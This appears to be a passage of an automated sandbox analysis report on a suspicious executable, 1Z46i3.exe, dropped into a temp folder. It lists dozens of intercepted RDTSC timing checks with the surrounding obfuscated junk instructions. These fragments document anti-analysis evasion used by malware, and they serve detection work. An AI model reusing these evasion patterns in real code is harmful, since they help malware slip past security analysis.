Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA4A55 second address: FA4A59 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA3BC3 second address: FA3BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA3BC7 second address: FA3BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA5A12 second address: FA5A16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA5A16 second address: FA5A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA6DC0 second address: FA6DE0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F4E3C536598h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA9DA6 second address: FA9DAC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAAF70 second address: FAAF85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F4E3C536588h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FA9DAC second address: FA9DB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F4E3CF48086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAAF85 second address: FAAF89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAAF89 second address: FAAF93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FACFAF second address: FACFBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F4E3C536586h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FACFBA second address: FACFC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F4E3CF48086h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FACFC4 second address: FACFC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FADFE1 second address: FADFE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAD211 second address: FAD21D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edi 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAF0AB second address: FAF0AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAF0AF second address: FAF0B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1125 second address: FB1132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jno 00007F4E3CF48086h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1132 second address: FB1136 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FAF24F second address: FAF255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1136 second address: FB113F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB113F second address: FB1162 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3CF48096h 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1162 second address: FB1168 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1168 second address: FB1177 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007F4E3CF4808Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1177 second address: FB117B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB117B second address: FB1191 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jl 00007F4E3CF48086h 0x0000000b jne 00007F4E3CF48086h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1A56 second address: FB1A5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FB1A5A second address: FB1A68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007F4E3CF48086h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC108C second address: FC1090 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC114D second address: FC119B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jmp 00007F4E3CF48099h 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push ebx 0x00000011 jmp 00007F4E3CF48093h 0x00000016 pop ebx 0x00000017 pushad 0x00000018 ja 00007F4E3CF48086h 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 popad 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 pushad 0x00000028 popad 0x00000029 pushad 0x0000002a popad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC119B second address: FC11CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536591h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4E3C536599h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC24D9 second address: FC24DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC24DD second address: FC24F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007F4E3C536592h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC24F4 second address: FC24FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC24FA second address: FC24FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC24FE second address: FC250B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4E3CF48088h 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC250B second address: FC2534 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F4E3C536586h 0x0000000a pop ebx 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jnl 00007F4E3C53658Eh 0x00000015 jmp 00007F4E3C53658Ch 0x0000001a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F55EDF second address: F55EE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F55EE3 second address: F55F21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007F4E3C536592h 0x0000000f jmp 00007F4E3C536599h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC4F09 second address: FC4F15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC4F15 second address: FC4F1F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E3C53658Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC4F1F second address: FC4F32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push esi 0x00000006 pop esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC4F32 second address: FC4F38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FC4F38 second address: FC4F4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F4E3CF4808Dh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAD9F second address: FCADC6 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4E3C53658Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4E3C536593h 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCADC6 second address: FCADD2 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F4E3CF4808Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA248 second address: FCA255 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F4E3C536586h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA524 second address: FCA549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 jns 00007F4E3CF4808Ah 0x0000000f popad 0x00000010 push ecx 0x00000011 jns 00007F4E3CF4808Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a pop eax 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA673 second address: FCA677 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA7ED second address: FCA7F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA7F8 second address: FCA7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA959 second address: FCA95D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA95D second address: FCA997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C53658Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007F4E3C536586h 0x00000012 pop edx 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F4E3C536598h 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA997 second address: FCA99D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA99D second address: FCA9A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCA9A2 second address: FCA9A9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAAD0 second address: FCAAD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAC38 second address: FCAC4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jng 00007F4E3CF48086h 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAC4B second address: FCAC6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F4E3C536598h 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAC6C second address: FCAC7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F4E3CF48086h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAC7C second address: FCAC80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCAC80 second address: FCAC86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCF02E second address: FCF03C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C53658Ah 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCF03C second address: FCF046 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4E3CF48086h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCF046 second address: FCF052 instructions: 0x00000000 rdtsc 0x00000002 je 00007F4E3C53658Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCDEC3 second address: FCDEE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 ja 00007F4E3CF4808Ch 0x0000000e je 00007F4E3CF48086h 0x00000014 pop edx 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a ja 00007F4E3CF48086h 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCDEE5 second address: FCDEF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCDEF1 second address: FCDEF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: FCDEF5 second address: FCDEFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95861 second address: F79E9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 jmp 00007F4E3CF48096h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007F4E3CF48088h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 lea eax, dword ptr [ebp+1248655Ch] 0x0000002d call 00007F4E3CF4808Ah 0x00000032 or dword ptr [ebp+122D1C13h], edi 0x00000038 pop ecx 0x00000039 or dword ptr [ebp+122D278Ah], eax 0x0000003f nop 0x00000040 jmp 00007F4E3CF48092h 0x00000045 push eax 0x00000046 jbe 00007F4E3CF48092h 0x0000004c je 00007F4E3CF4808Ch 0x00000052 jp 00007F4E3CF48086h 0x00000058 nop 0x00000059 mov edi, dword ptr [ebp+122D2B0Ah] 0x0000005f call dword ptr [ebp+122DB6EAh] 0x00000065 js 00007F4E3CF4809Fh 0x0000006b pushad 0x0000006c jmp 00007F4E3CF4808Bh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95A60 second address: F95A77 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3C536593h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95F6D second address: F95F81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4E3CF48090h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95F81 second address: F95F8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4E3C536586h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95F8B second address: F95FB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 mov dl, cl 0x0000000b call 00007F4E3CF48089h 0x00000010 push eax 0x00000011 push eax 0x00000012 jmp 00007F4E3CF4808Ch 0x00000017 pop eax 0x00000018 pop eax 0x00000019 push eax 0x0000001a pushad 0x0000001b push edi 0x0000001c pushad 0x0000001d popad 0x0000001e pop edi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95FB9 second address: F95FCA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F95FCA second address: F95FCF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F960F5 second address: F960F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F960F9 second address: F96140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c js 00007F4E3CF4809Eh 0x00000012 xchg eax, esi 0x00000013 mov ecx, ebx 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F4E3CF48095h 0x0000001f rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F96140 second address: F96144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F96144 second address: F9614A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F9677D second address: F96792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4E3C536590h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\1Z46i3.exe	RDTSC instruction interceptor: First address: F96792 second address: F96797 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
